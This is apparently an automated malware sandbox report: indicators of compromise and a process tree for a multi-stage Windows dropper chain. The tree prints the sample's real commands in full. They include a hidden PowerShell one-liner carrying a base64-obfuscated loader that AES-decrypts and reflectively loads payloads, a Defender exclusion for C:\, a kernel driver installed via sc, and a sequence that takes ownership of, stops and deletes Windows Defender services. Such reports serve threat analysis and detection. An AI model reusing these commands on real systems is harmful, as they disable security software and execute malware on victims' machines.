description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 19404 taskkill.exe 18536 taskkill.exe 17912 taskkill.exe 15496 taskkill.exe 19132 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881387146850008" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings rapes.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5924 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4616 random.exe 4616 random.exe 3416 rapes.exe 3416 rapes.exe 956 MSBuild.exe 956 MSBuild.exe 956 MSBuild.exe 956 MSBuild.exe 1536 MSBuild.exe 1536 MSBuild.exe 1536 MSBuild.exe 1536 MSBuild.exe 5924 powershell.exe 5924 powershell.exe 1512 powershell.exe 1512 powershell.exe 1512 powershell.exe 5716 rapes.exe 5716 rapes.exe 1904 060787c2b1.exe 1904 060787c2b1.exe 1448 MSBuild.exe 1448 MSBuild.exe 4436 MSBuild.exe 4436 MSBuild.exe 4436 MSBuild.exe 4436 MSBuild.exe 1448 MSBuild.exe 1448 MSBuild.exe 2732 chrome.exe 2732 chrome.exe 4556 93de04080d.exe 4556 93de04080d.exe 1448 MSBuild.exe 1448 MSBuild.exe 1068 powershell.exe 1068 powershell.exe 1068 powershell.exe 4568 MSBuild.exe 4568 MSBuild.exe 4568 MSBuild.exe 4568 MSBuild.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 1448 MSBuild.exe 1448 MSBuild.exe 1860 MSBuild.exe 1860 MSBuild.exe 1860 MSBuild.exe 1860 MSBuild.exe 1448 MSBuild.exe 1448 MSBuild.exe 720 8b2e4e6c8c.exe 720 8b2e4e6c8c.exe 720 8b2e4e6c8c.exe 720 8b2e4e6c8c.exe 1204 MSBuild.exe 1204 MSBuild.exe 1204 MSBuild.exe 1204 MSBuild.exe 2368 Constraints.com 2368 Constraints.com 2368 Constraints.com -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 648 Process not Found 648 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 3372 msedge.exe 3372 msedge.exe 3372 msedge.exe 3372 msedge.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 5924 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 6068 MSBuild.exe Token: SeIncreaseQuotaPrivilege 6068 MSBuild.exe Token: SeSecurityPrivilege 6068 MSBuild.exe Token: SeTakeOwnershipPrivilege 6068 MSBuild.exe Token: SeLoadDriverPrivilege 6068 MSBuild.exe Token: SeSystemProfilePrivilege 6068 MSBuild.exe Token: SeSystemtimePrivilege 6068 MSBuild.exe Token: SeProfSingleProcessPrivilege 6068 MSBuild.exe Token: SeIncBasePriorityPrivilege 6068 MSBuild.exe Token: SeCreatePagefilePrivilege 6068 MSBuild.exe Token: SeBackupPrivilege 6068 MSBuild.exe Token: SeRestorePrivilege 6068 MSBuild.exe Token: SeShutdownPrivilege 6068 MSBuild.exe Token: SeDebugPrivilege 6068 MSBuild.exe Token: SeSystemEnvironmentPrivilege 6068 MSBuild.exe Token: SeRemoteShutdownPrivilege 6068 MSBuild.exe Token: SeUndockPrivilege 6068 MSBuild.exe Token: SeManageVolumePrivilege 6068 MSBuild.exe Token: 33 6068 MSBuild.exe Token: 34 6068 MSBuild.exe Token: 35 6068 MSBuild.exe Token: 36 6068 MSBuild.exe Token: SeIncreaseQuotaPrivilege 6068 MSBuild.exe Token: SeSecurityPrivilege 6068 MSBuild.exe Token: SeTakeOwnershipPrivilege 6068 MSBuild.exe Token: SeLoadDriverPrivilege 6068 MSBuild.exe Token: SeSystemProfilePrivilege 6068 MSBuild.exe Token: SeSystemtimePrivilege 6068 MSBuild.exe Token: SeProfSingleProcessPrivilege 6068 MSBuild.exe Token: SeIncBasePriorityPrivilege 6068 MSBuild.exe Token: SeCreatePagefilePrivilege 6068 MSBuild.exe Token: SeBackupPrivilege 6068 MSBuild.exe Token: SeRestorePrivilege 6068 MSBuild.exe Token: SeShutdownPrivilege 6068 MSBuild.exe Token: SeDebugPrivilege 6068 MSBuild.exe Token: SeSystemEnvironmentPrivilege 6068 MSBuild.exe Token: SeRemoteShutdownPrivilege 6068 MSBuild.exe Token: SeUndockPrivilege 6068 MSBuild.exe Token: SeManageVolumePrivilege 6068 MSBuild.exe Token: 33 6068 MSBuild.exe Token: 34 6068 MSBuild.exe Token: 35 6068 MSBuild.exe Token: 36 6068 MSBuild.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeShutdownPrivilege 2732 chrome.exe Token: SeCreatePagefilePrivilege 2732 chrome.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeDebugPrivilege 4576 tasklist.exe Token: SeDebugPrivilege 1784 tasklist.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 2732 chrome.exe 3372 msedge.exe 2368 Constraints.com 2368 Constraints.com 2368 Constraints.com -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2368 Constraints.com 2368 Constraints.com 2368 Constraints.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4616 wrote to memory of 3416 4616 random.exe 91 PID 4616 wrote to memory of 3416 4616 random.exe 91 PID 4616 wrote to memory of 3416 4616 random.exe 91 PID 3416 wrote to memory of 4632 3416 rapes.exe 97 PID 3416 wrote to memory of 4632 3416 rapes.exe 97 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 4632 wrote to memory of 956 4632 dojG16n.exe 98 PID 3416 wrote to memory of 2164 3416 rapes.exe 101 PID 3416 wrote to memory of 2164 3416 rapes.exe 101 PID 2164 wrote to memory of 5756 2164 PJ7KEk9.exe 102 PID 2164 wrote to memory of 5756 2164 PJ7KEk9.exe 102 PID 2164 wrote to memory of 5756 2164 PJ7KEk9.exe 102 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 2164 wrote to memory of 1536 2164 PJ7KEk9.exe 103 PID 3416 wrote to memory of 5992 3416 rapes.exe 104 PID 3416 wrote to memory of 5992 3416 rapes.exe 104 PID 3416 wrote to memory of 5992 3416 rapes.exe 104 PID 5992 wrote to memory of 5000 5992 cmd.exe 106 PID 5992 wrote to memory of 5000 5992 cmd.exe 106 PID 5992 wrote to memory of 5000 5992 cmd.exe 106 PID 5000 wrote to memory of 5924 5000 cmd.exe 108 PID 5000 wrote to memory of 5924 5000 cmd.exe 108 PID 5000 wrote to memory of 5924 5000 cmd.exe 108 PID 5924 wrote to memory of 1512 5924 powershell.exe 109 PID 5924 wrote to memory of 1512 5924 powershell.exe 109 PID 5924 wrote to memory of 1512 5924 powershell.exe 109 PID 3416 wrote to memory of 1036 3416 rapes.exe 111 PID 3416 wrote to memory of 1036 3416 rapes.exe 111 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 1036 wrote to memory of 6068 1036 4WMUMmx.exe 112 PID 3416 wrote to memory of 5844 3416 rapes.exe 114 PID 3416 wrote to memory of 5844 3416 rapes.exe 114 PID 3416 wrote to memory of 5844 3416 rapes.exe 114 PID 5844 wrote to memory of 6128 5844 apple.exe 115 PID 5844 wrote to memory of 6128 5844 apple.exe 115 PID 5844 wrote to memory of 6128 5844 apple.exe 115 PID 6128 wrote to memory of 6044 6128 261.exe 117 PID 6128 wrote to memory of 6044 6128 261.exe 117 PID 6044 wrote to memory of 2844 6044 cmd.exe 119 PID 6044 wrote to memory of 2844 6044 cmd.exe 119 PID 6044 wrote to memory of 2844 6044 cmd.exe 119 PID 2844 wrote to memory of 4572 2844 261.exe 120 PID 2844 wrote to memory of 4572 2844 261.exe 120 PID 4572 wrote to memory of 3020 4572 cmd.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 11525⤵
- Program crash
PID:4204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5844 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E37A.tmp\E37B.tmp\E37C.bat C:\Users\Admin\AppData\Local\Temp\261.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:6044 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E4C2.tmp\E4C3.tmp\E4C4.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:3664
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:4128
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:4628
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5132
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5680
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:836
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:4664
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:5624
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:5276
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:5824
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:5056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:5380
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:4336
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:2120
-
-
